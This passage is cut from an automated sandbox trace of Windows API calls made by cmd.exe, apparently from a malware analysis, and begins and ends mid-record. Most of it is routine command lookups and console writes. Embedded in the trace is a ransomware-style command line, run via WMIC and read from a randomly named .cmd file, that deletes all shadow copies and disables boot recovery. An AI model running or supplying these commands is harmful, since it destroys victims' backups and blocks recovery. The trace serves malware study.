(_String1="wmic.exe", _String2="RD") returned 5 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="RMDIR") returned 5 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="PATH") returned 7 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="GOTO") returned 16 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="SHIFT") returned 4 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="CLS") returned 20 [0159.101] _wcsicmp (_String1="wmic.exe", 
_String2="CALL") returned 20 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="VERIFY") returned 1 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="VER") returned 1 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="VOL") returned 1 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="EXIT") returned 18 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="SETLOCAL") returned 4 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="ENDLOCAL") returned 18 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="TITLE") returned 3 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="START") returned 4 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="DPATH") returned 19 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="KEYS") returned 12 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="MOVE") returned 10 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="PUSHD") returned 7 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="POPD") returned 7 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="ASSOC") returned 22 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="FTYPE") returned 17 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="BREAK") returned 21 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="COLOR") returned 20 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="MKLINK") returned 10 [0159.101] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0159.101] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0159.102] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0159.102] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28f25c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 
lpFindFileData=0x28f25c) returned 0xffffffff [0159.102] GetLastError () returned 0x2 [0159.102] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\wmic.exe.*", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0xffffffff [0159.102] GetLastError () returned 0x2 [0159.102] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0xffffffff [0159.102] GetLastError () returned 0x2 [0159.103] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28f25c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f25c) returned 0xffffffff [0159.103] GetLastError () returned 0x2 [0159.103] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.exe.*", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0xffffffff [0159.103] GetLastError () returned 0x2 [0159.103] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0xffffffff [0159.103] GetLastError () returned 0x2 [0159.103] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28f25c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f25c) returned 0xffffffff [0159.103] GetLastError () returned 0x2 [0159.103] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.exe.*", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0xffffffff [0159.103] GetLastError () returned 0x2 [0159.103] 
FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0xffffffff [0159.104] GetLastError () returned 0x2 [0159.104] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28f25c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f25c) returned 0x492048 [0159.104] FindClose (in: hFindFile=0x492048 | out: hFindFile=0x492048) returned 1 [0159.104] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0159.104] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0159.104] GetConsoleTitleW (in: lpConsoleTitle=0x28f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0159.104] GetFileAttributesW (lpFileName="wmic.exe" (normalized: "c:\\users\\eebsym5\\desktop\\wmic.exe")) returned 0xffffffff [0159.104] _wcsicmp (_String1="wmic", _String2="DIR") returned 19 [0159.104] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18 [0159.104] _wcsicmp (_String1="wmic", _String2="DEL") returned 19 [0159.104] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3 [0159.104] _wcsicmp (_String1="wmic", _String2="COPY") returned 20 [0159.104] _wcsicmp (_String1="wmic", _String2="CD") returned 20 [0159.104] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20 [0159.104] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5 [0159.104] _wcsicmp (_String1="wmic", _String2="REN") returned 5 [0159.104] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18 [0159.104] _wcsicmp (_String1="wmic", _String2="SET") returned 4 [0159.104] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7 [0159.104] _wcsicmp (_String1="wmic", _String2="DATE") returned 19 [0159.104] _wcsicmp (_String1="wmic", _String2="TIME") returned 3 [0159.104] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7 [0159.105] _wcsicmp 
(_String1="wmic", _String2="MD") returned 10 [0159.105] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10 [0159.105] _wcsicmp (_String1="wmic", _String2="RD") returned 5 [0159.105] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5 [0159.105] _wcsicmp (_String1="wmic", _String2="PATH") returned 7 [0159.105] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16 [0159.105] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4 [0159.105] _wcsicmp (_String1="wmic", _String2="CLS") returned 20 [0159.105] _wcsicmp (_String1="wmic", _String2="CALL") returned 20 [0159.105] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1 [0159.105] _wcsicmp (_String1="wmic", _String2="VER") returned 1 [0159.105] _wcsicmp (_String1="wmic", _String2="VOL") returned 1 [0159.105] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18 [0159.105] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4 [0159.105] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18 [0159.105] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3 [0159.105] _wcsicmp (_String1="wmic", _String2="START") returned 4 [0159.105] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19 [0159.105] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12 [0159.105] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10 [0159.105] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7 [0159.105] _wcsicmp (_String1="wmic", _String2="POPD") returned 7 [0159.105] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22 [0159.105] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17 [0159.105] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21 [0159.105] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20 [0159.105] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10 [0159.105] _wcsicmp (_String1="wmic", _String2="DIR") returned 19 [0159.105] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18 [0159.105] _wcsicmp (_String1="wmic", _String2="DEL") returned 19 
[0159.105] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3 [0159.105] _wcsicmp (_String1="wmic", _String2="COPY") returned 20 [0159.105] _wcsicmp (_String1="wmic", _String2="CD") returned 20 [0159.105] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20 [0159.105] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5 [0159.105] _wcsicmp (_String1="wmic", _String2="REN") returned 5 [0159.105] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18 [0159.105] _wcsicmp (_String1="wmic", _String2="SET") returned 4 [0159.105] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7 [0159.105] _wcsicmp (_String1="wmic", _String2="DATE") returned 19 [0159.105] _wcsicmp (_String1="wmic", _String2="TIME") returned 3 [0159.106] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7 [0159.106] _wcsicmp (_String1="wmic", _String2="MD") returned 10 [0159.106] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10 [0159.106] _wcsicmp (_String1="wmic", _String2="RD") returned 5 [0159.106] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5 [0159.106] _wcsicmp (_String1="wmic", _String2="PATH") returned 7 [0159.106] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16 [0159.106] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4 [0159.106] _wcsicmp (_String1="wmic", _String2="CLS") returned 20 [0159.106] _wcsicmp (_String1="wmic", _String2="CALL") returned 20 [0159.106] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1 [0159.106] _wcsicmp (_String1="wmic", _String2="VER") returned 1 [0159.106] _wcsicmp (_String1="wmic", _String2="VOL") returned 1 [0159.106] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18 [0159.106] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4 [0159.106] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18 [0159.106] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3 [0159.106] _wcsicmp (_String1="wmic", _String2="START") returned 4 [0159.106] _wcsicmp (_String1="wmic", _String2="DPATH") 
returned 19 [0159.106] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12 [0159.106] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10 [0159.106] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7 [0159.106] _wcsicmp (_String1="wmic", _String2="POPD") returned 7 [0159.106] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22 [0159.106] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17 [0159.106] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21 [0159.106] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20 [0159.106] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10 [0159.106] _wcsicmp (_String1="wmic", _String2="FOR") returned 17 [0159.106] _wcsicmp (_String1="wmic", _String2="IF") returned 14 [0159.106] _wcsicmp (_String1="wmic", _String2="REM") returned 5 [0159.106] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0159.106] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0159.107] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0159.107] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28eb48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb48) returned 0xffffffff [0159.107] GetLastError () returned 0x2 [0159.107] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\wmic.exe.*", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0xffffffff [0159.107] GetLastError () returned 0x2 [0159.107] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, 
lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0xffffffff [0159.107] GetLastError () returned 0x2 [0159.108] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28eb48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb48) returned 0xffffffff [0159.108] GetLastError () returned 0x2 [0159.108] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.exe.*", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0xffffffff [0159.108] GetLastError () returned 0x2 [0159.108] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0xffffffff [0159.108] GetLastError () returned 0x2 [0159.108] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28eb48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb48) returned 0xffffffff [0159.108] GetLastError () returned 0x2 [0159.108] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.exe.*", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0xffffffff [0159.109] GetLastError () returned 0x2 [0159.109] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0xffffffff [0159.109] GetLastError () returned 0x2 [0159.109] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.exe", fInfoLevelId=0x1, lpFindFileData=0x28eb48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb48) returned 0x4922e0 [0159.109] FindClose (in: 
hFindFile=0x4922e0 | out: hFindFile=0x4922e0) returned 1 [0159.109] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0159.109] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0159.109] GetConsoleTitleW (in: lpConsoleTitle=0x28f020, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0159.109] InitializeProcThreadAttributeList (in: lpAttributeList=0x28eea8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28ef70 | out: lpAttributeList=0x28eea8, lpSize=0x28ef70) returned 1 [0159.109] UpdateProcThreadAttribute (in: lpAttributeList=0x28eea8, dwFlags=0x0, Attribute=0x60001, lpValue=0x28ef68, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28eea8, lpPreviousValue=0x0) returned 1 [0159.109] GetStartupInfoW (in: lpStartupInfo=0x28ee64 | out: lpStartupInfo=0x28ee64*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0159.109] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0159.109] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="wmic.exe process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28ef04*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wmic.exe process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"", dwX=0x0, 
dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28ef50 | out: lpCommandLine="wmic.exe process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"", lpProcessInformation=0x28ef50*(hProcess=0x58, hThread=0x54, dwProcessId=0xf38, dwThreadId=0xf7c)) returned 1 [0159.578] CloseHandle (hObject=0x54) returned 1 [0159.578] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0159.578] GetEnvironmentStringsW () returned 0x490940* [0159.579] FreeEnvironmentStringsW (penv=0x490940) returned 1 [0159.579] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0 [0178.648] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0x28ee44 | out: lpExitCode=0x28ee44*=0x0) returned 1 [0178.648] CloseHandle (hObject=0x58) returned 1 [0178.648] _vsnwprintf (in: _Buffer=0x28ef8c, _BufferCount=0x13, _Format="%08X", _ArgList=0x28ee50 | out: _Buffer="00000000") returned 8 [0178.648] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0178.648] GetEnvironmentStringsW () returned 0x490940* [0178.648] FreeEnvironmentStringsW (penv=0x490940) returned 1 [0178.648] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0178.648] GetEnvironmentStringsW () returned 0x490940* [0178.648] FreeEnvironmentStringsW (penv=0x490940) returned 1 [0178.648] DeleteProcThreadAttributeList (in: lpAttributeList=0x28eea8 | out: lpAttributeList=0x28eea8) [0178.648] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.648] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0178.648] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.648] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 
[0178.649] _get_osfhandle (_FileHandle=0) returned 0x3 [0178.649] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0178.649] SetConsoleInputExeNameW () returned 0x1 [0178.649] GetConsoleOutputCP () returned 0x1b5 [0178.649] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0178.649] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.649] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0178.649] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0178.649] _get_osfhandle (_FileHandle=3) returned 0x58 [0178.649] SetFilePointer (in: hFile=0x58, lDistanceToMove=243, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf3 [0178.650] _get_osfhandle (_FileHandle=3) returned 0x58 [0178.650] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf3 [0178.650] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f6a8*=0x149, lpOverlapped=0x0) returned 1 [0178.651] SetFilePointer (in: hFile=0x58, lDistanceToMove=269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10d [0178.651] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=26, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="echo CiOHhXJTCFVtKQz1Zuv\r\nte \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy 
ignoreallfailures\"\r\n") returned 26 [0178.651] GetFileType (hFile=0x58) returned 0x1 [0178.651] _get_osfhandle (_FileHandle=3) returned 0x58 [0178.651] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10d [0178.652] _tell (_FileHandle=3) returned 269 [0178.652] _close (_FileHandle=3) returned 0 [0178.652] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f47c | out: _Buffer="\r\n") returned 2 [0178.652] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.652] GetFileType (hFile=0x7) returned 0x2 [0178.652] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.652] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f43c | out: lpMode=0x28f43c) returned 1 [0178.652] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.652] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f468*=0x2) returned 1 [0178.653] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0178.653] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0178.653] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0178.653] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f478 | out: _Buffer=">") returned 1 [0178.653] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.653] GetFileType (hFile=0x7) returned 0x2 [0178.653] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.653] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f440 | out: lpMode=0x28f440) returned 1 [0178.654] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.654] WriteConsoleW (in: hConsoleOutput=0x7, 
lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f46c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x28f46c*=0x19) returned 1 [0178.654] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.654] GetFileType (hFile=0x7) returned 0x2 [0178.654] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.654] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6c4 | out: lpMode=0x28f6c4) returned 1 [0178.655] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.655] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a0d90*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x28f6f0, lpReserved=0x0 | out: lpBuffer=0x4a0d90*, lpNumberOfCharsWritten=0x28f6f0*=0x4) returned 1 [0178.655] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f6fc | out: _Buffer=" CiOHhXJTCFVtKQz1Zuv ") returned 21 [0178.655] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.655] GetFileType (hFile=0x7) returned 0x2 [0178.656] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.656] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6bc | out: lpMode=0x28f6bc) returned 1 [0178.656] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.656] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x28f6e8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f6e8*=0x15) returned 1 [0178.656] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f71c | out: _Buffer="\r\n") returned 2 [0178.656] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.656] GetFileType (hFile=0x7) returned 0x2 [0178.656] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.656] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6dc | out: lpMode=0x28f6dc) returned 1 [0178.656] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.656] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, 
lpNumberOfCharsWritten=0x28f708, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f708*=0x2) returned 1 [0178.657] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0178.657] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0178.657] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0178.657] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0178.657] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0178.657] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0178.657] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0178.657] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0178.657] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0178.657] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0178.657] GetConsoleTitleW (in: lpConsoleTitle=0x28f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.657] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x28f254 | out: _Buffer="CiOHhXJTCFVtKQz1Zuv\r\n") returned 21 [0178.657] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.657] GetFileType (hFile=0x7) returned 0x2 [0178.657] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.657] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f214 | out: lpMode=0x28f214) returned 1 [0178.657] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.657] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x28f240, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, 